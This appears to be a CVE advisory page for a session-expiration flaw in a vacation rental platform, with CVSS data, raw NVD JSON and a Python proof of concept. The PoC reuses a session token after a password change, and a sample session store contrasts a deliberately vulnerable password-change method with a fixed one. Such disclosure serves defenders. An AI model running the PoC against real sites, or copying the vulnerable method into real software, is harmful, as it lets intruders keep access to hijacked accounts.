Security Vulnerability Report
CVE-2025-63563 CVSS 6.5 MEDIUM

CVE-2025-63563

Published: 2025-10-31 21:15:45
Last Modified: 2025-11-05 19:10:38

Description

Summer Pearl Group Vacation Rental Management Platform prior to v1.0.2 does not properly invalidate active user sessions after a password change. This allows an attacker with a valid session token to maintain access to the account even after the legitimate user changes their password.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:summerpearlgroup:vacation_rental_management_platform:*:*:*:*:*:*:*:* - VULNERABLE
Summer Pearl Group Vacation Rental Management Platform < v1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63563 Session Fixation PoC
# Note: the advisory describes sessions staying valid after a password change;
# steps 1-2 below only simulate how an attacker would come to hold a valid token.
import requests

TARGET_URL = "https://vulnerable-server.com"
VICTIM_USERNAME = "[email protected]"
VICTIM_PASSWORD = "OldPassword123"
NEW_PASSWORD = "NewPassword456"


def exploit_session_fixation():
    """
    Session Fixation Attack Steps:
    1. Attacker obtains a valid session token (e.g., via XSS or MITM)
    2. Victim authenticates with the attacker's session token
    3. Victim changes password
    4. Attacker uses the same session token to access victim's account
    """
    session = requests.Session()

    # Step 1: Attacker obtains a session token (simulated)
    init_response = session.get(f"{TARGET_URL}/login")
    attacker_session_token = session.cookies.get('SESSION_ID')
    print(f"[+] Attacker obtains session token: {attacker_session_token}")

    # Step 2: Victim authenticates with attacker's session token
    session.cookies.set('SESSION_ID', attacker_session_token)
    login_data = {
        'username': VICTIM_USERNAME,
        'password': VICTIM_PASSWORD
    }
    session.post(f"{TARGET_URL}/login", data=login_data)
    print("[+] Victim logged in with attacker's session token")

    # Step 3: Victim changes password
    change_pwd_data = {
        'current_password': VICTIM_PASSWORD,
        'new_password': NEW_PASSWORD
    }
    session.post(f"{TARGET_URL}/account/change-password", data=change_pwd_data)
    print("[+] Victim changed password")

    # Step 4: Attacker uses old session token to access account
    attacker_session = requests.Session()
    attacker_session.cookies.set('SESSION_ID', attacker_session_token)
    response = attacker_session.get(f"{TARGET_URL}/account/dashboard")

    if response.status_code == 200 and "account_data" in response.text:
        print("[+] VULNERABLE: Attacker still has access after password change!")
        return True
    else:
        print("[-] NOT VULNERABLE: Session was properly invalidated")
        return False


if __name__ == "__main__":
    exploit_session_fixation()
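Added example, not taken from the advisory, the vendor's platform or the PoC author: a hypothetical in-memory session store whose change_password_vulnerable mirrors the behaviour described above, next to change_password_fixed, which revokes every session of the user and issues a fresh server-generated token. All class and method names are assumptions, and the salted SHA-256 stands in for a real password KDF.

```python
import hashlib
import hmac
import secrets

class SessionStore:
    """Hypothetical server-side session store: opaque token -> user id."""

    def __init__(self):
        self._users = {}     # user_id -> (salt, sha256 hash); a real app would use a KDF
        self._sessions = {}  # token -> user_id

    @staticmethod
    def _hash(password, salt):
        return hashlib.sha256(salt + password.encode()).hexdigest()

    def set_password(self, user_id, password):
        salt = secrets.token_bytes(16)
        self._users[user_id] = (salt, self._hash(password, salt))

    def _verify(self, user_id, password):
        salt, stored = self._users[user_id]
        return hmac.compare_digest(stored, self._hash(password, salt))

    def login(self, user_id, password):
        if not self._verify(user_id, password):
            return None
        token = secrets.token_urlsafe(32)  # server-generated, never client-chosen
        self._sessions[token] = user_id
        return token

    def user_for(self, token):
        # None means the presented token is not a live session
        return self._sessions.get(token)

    def change_password_vulnerable(self, token, old, new):
        """The behaviour the advisory describes: hash updated, all sessions left alive."""
        user_id = self._sessions.get(token)
        if user_id is None or not self._verify(user_id, old):
            return None
        self.set_password(user_id, new)
        return token  # caller (and anyone else holding a token) keeps access

    def change_password_fixed(self, token, old, new):
        """Hardened: revoke every session of the user, then issue a fresh token."""
        user_id = self._sessions.get(token)
        if user_id is None or not self._verify(user_id, old):
            return None
        self.set_password(user_id, new)
        self._sessions = {t: u for t, u in self._sessions.items() if u != user_id}
        return self.login(user_id, new)
```

A detection-side check for the same flaw is to log in twice, change the password from one session, and confirm the other token no longer resolves to the account.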

References

https://github.com/Stolichnayer/Summer-Pearl-Group-Insufficient-Session-Expiration (tagged "Product" in the raw JSON record below)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63563",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T21:15:44.713",
    "lastModified": "2025-11-05T19:10:38.197",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Summer Pearl Group Vacation Rental Management Platform prior to v1.0.2 does not properly invalidate active user sessions after a password change. This allows an attacker with a valid session token to maintain access to the account even after the legitimate user changes their password."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-286"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:summerpearlgroup:vacation_rental_management_platform:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.0.2",
                "matchCriteriaId": "E70289E7-BECA-463B-ABB1-0C46DBDF2057"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Stolichnayer/Summer-Pearl-Group-Insufficient-Session-Expiration",
        "source": "[email protected]",
        "tags": [
          "Product"
        ]
      }
    ]
  }
}